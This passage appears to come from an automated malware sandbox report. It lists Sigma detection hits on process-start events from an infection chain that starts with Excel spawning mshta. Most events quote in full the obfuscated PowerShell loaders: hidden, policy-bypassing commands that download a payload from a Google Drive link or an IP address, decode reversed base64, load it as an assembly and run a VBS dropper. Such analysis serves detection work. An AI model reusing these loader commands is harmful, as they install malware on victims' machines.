[System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdes
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , ProcessId: 3028, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0n
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", CommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiA
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3596, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3868, ProcessName: mshta.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4008, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe, ProcessId: 3116, ProcessName: powershell.exe
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 